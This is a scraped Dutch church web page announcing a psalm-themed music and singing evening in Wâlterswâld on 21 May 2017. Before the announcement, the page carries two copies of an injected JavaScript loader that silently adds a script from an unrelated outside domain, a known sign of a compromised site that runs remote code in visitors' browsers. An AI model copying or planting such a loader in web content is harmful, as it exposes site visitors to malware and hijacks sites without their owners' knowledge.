;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Muziek- en zangavond Wâlterswâld! - PKN Damwâld
21 mei 2017
19:30 t/m 21:00
Geref. kerk vrijgemaakt 'De Lichtbron' Wâlterswâld
Muziek- en zangavond Wâlterswâld!

Op zondagavond 21 mei zal er in de Gereformeerde kerk ’De Lichtbron’ (Tsjerkeloane 12, Wâlterswâld), weer een muziek- en zangavond worden gehouden.
Deze avond begint om 19:30.
Het thema is dit maal: ‘Juicht, o volken, juicht´. Samen gaan we zingen en musiceren over dit thema, welke ontleent is aan psalm 47. De liederen en muzikale stukken hebben dan ook alles te maken met Hemelvaart en Pinksteren: Jezus steeg op naar de Hemel, maar stuurde toen de Heilige Geest, waardoor wij mogen geloven in Hem, die voor onze zonden stierf.
Muzikale medewerking wordt verleend door een ensemble van het Christelijk muziekkorps ’Excelsior’ Driezum / Wâlterswâld en organist Jogchum Sipma.
Al met al belooft het weer een prachtige avond te worden, waar wij u en jullie van harte voor willen uitnodigen.
De toegang is gratis. Wel is er, ter bestrijding van de onkosten, na afloop een deurcollecte. Tevens is er na afloop gelegenheid tot het drinken van een kopje koffie, thee of fris.
Graag tot zondag 21 mei, aanvang 19:30!

Locatie: Geref. kerk vrijgemaakt 'De Lichtbron' WâlterswâldTsjerkeloane 12, Wouterswoude